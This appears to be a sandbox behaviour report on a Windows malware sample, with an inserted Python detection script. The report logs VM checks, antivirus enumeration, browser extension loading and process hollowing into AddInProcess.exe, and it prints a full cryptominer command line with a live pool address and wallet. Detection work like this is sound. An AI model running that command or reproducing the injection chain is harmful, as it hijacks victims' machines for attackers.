Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AddInProcess.exe, 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread register set: target process: 7492 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 3C1DA89010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
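The lines above are the detectable core of this chain: Target.exe spawns the legitimate .NET host AddInProcess.exe, writes a PE image (first bytes 4D5A) into it at base 140000000, and the hollowed process runs with an xmrig-style command line (pool endpoint, wallet, rx/0 algorithm, thread hint). The following Python is an added example written for this page, not code from the sandbox vendor or from the sample, showing how a detection engineer could score such telemetry. It assumes a minimal Event record, constructed sample events modelled on the report's behaviour lines, and that a benign AddInProcess.exe launch carries only /guid: and /pid: arguments from its System.AddIn host (the GUID and pid in the benign sample are invented); the miner command line and image paths are the ones logged above.

```python
"""Triage heuristics for a hollowed .NET host running a miner (added example)."""
import ntpath
import re
from dataclasses import dataclass

# Image paths as logged in the report's process tree.
TARGET_EXE = r"C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe"
ADDIN_EXE = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"

# Miner command line exactly as the report logged it.
XMRIG_CMDLINE = (
    ADDIN_EXE
    + " -o 185.196.10.233:35662"
    + " -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU"
    + " -p x --algo rx/0 --cpu-max-threads-hint=50"
)
# Constructed benign launch. Assumption: the System.AddIn host starts AddInProcess.exe
# with only /guid:<GUID> /pid:<host pid>; the GUID and pid here are invented.
LEGIT_ADDIN_CMDLINE = ADDIN_EXE + " /guid:3f2504e0-4f89-11d3-9a0c-0305e82c3301 /pid:4242"


@dataclass(frozen=True)
class Event:
    kind: str    # "process_create" or "memory_write"
    source: str  # image of the acting process (parent or writer)
    target: str  # child image, or the process that was written into
    detail: str  # command line, or the sandbox's description of the write


# Constructed telemetry modelled on the behaviour lines above (not the raw export).
EVENTS = [
    Event("process_create", TARGET_EXE, ADDIN_EXE, XMRIG_CMDLINE),
    Event("memory_write", TARGET_EXE, ADDIN_EXE, "base: 140000000 value starts with: 4D5A"),
    Event("memory_write", TARGET_EXE, ADDIN_EXE, "base: 140001000"),
    Event("process_create", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
          r"C:\Windows\System32\notepad.exe C:\notes.txt"),
    Event("process_create", r"C:\Program Files\Host\AddInHost.exe", ADDIN_EXE, LEGIT_ADDIN_CMDLINE),
]

# xmrig-style argument shapes; a hit on several of these is a strong miner signal.
MINER_PATTERNS = {
    "pool_endpoint": re.compile(r"(?:^|\s)(?:-o|--url)[=\s]+(?:stratum\+(?:tcp|ssl)://)?[\w.\-]+:\d{2,5}\b"),
    "wallet": re.compile(r"(?:^|\s)(?:-u|--user)[=\s]+[A-Za-z0-9]{40,}"),
    "algo": re.compile(r"--algo[=\s]+\S+"),
    "threads_hint": re.compile(r"--cpu-max-threads-hint[=\s]*\d+"),
    "donate_level": re.compile(r"--donate-level[=\s]*\d+"),
}


def miner_indicators(cmdline: str) -> list[str]:
    """Names of the miner argument shapes present in the command line."""
    return [name for name, pat in MINER_PATTERNS.items() if pat.search(cmdline)]


def split_image_args(cmdline: str) -> tuple[str, str]:
    """Split a Windows command line into (image path, remaining arguments)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)$', cmdline, re.S)
    return (m.group(1) or m.group(2)), m.group(3)


LEGIT_ADDIN_ARGS = re.compile(r"^/guid:\{?[0-9a-fA-F-]{36}\}?\s+/pid:\d+$")


def addinprocess_out_of_profile(cmdline: str) -> bool:
    """True when AddInProcess.exe runs with arguments its host would never pass."""
    image, args = split_image_args(cmdline)
    if ntpath.basename(image).lower() not in ("addinprocess.exe", "addinprocess32.exe"):
        return False
    return LEGIT_ADDIN_ARGS.match(args.strip()) is None


MZ_WRITE = re.compile(r"value starts with:\s*4D5A", re.I)


def hollowing_candidates(events):
    """(writer, target) pairs where a parent wrote an MZ header into a child it spawned."""
    spawned = {(e.source, e.target) for e in events if e.kind == "process_create"}
    return sorted({(e.source, e.target) for e in events
                   if e.kind == "memory_write" and MZ_WRITE.search(e.detail)
                   and (e.source, e.target) in spawned})


def triage(events):
    """Collect (finding, subject, evidence) tuples over the event set."""
    findings = []
    for e in events:
        if e.kind != "process_create":
            continue
        inds = miner_indicators(e.detail)
        if inds:
            findings.append(("miner_cmdline", e.target, ",".join(inds)))
        if addinprocess_out_of_profile(e.detail):
            findings.append(("addinprocess_args", e.target, split_image_args(e.detail)[1]))
    for src, tgt in hollowing_candidates(events):
        findings.append(("pe_written_into_child", tgt, src))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The three checks are deliberately independent: the command-line heuristics catch a miner even when the host binary changes, the argument-profile check catches AddInProcess.exe abuse even when the payload is not a miner, and the MZ-write pairing catches the hollowing itself regardless of what is injected. In production the same logic maps onto process-creation events (Sysmon Event ID 1 or Windows 4688 with command-line auditing) and cross-process write telemetry from an EDR.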
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Queries volume information: C:\Users\user\Desktop\zlONcFaXkc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Queries volume information: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 20_2_0000000140348448 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 20_2_0000000140348448
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Target.exe, 00000001.00000002.4278312501.000001D0B44C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY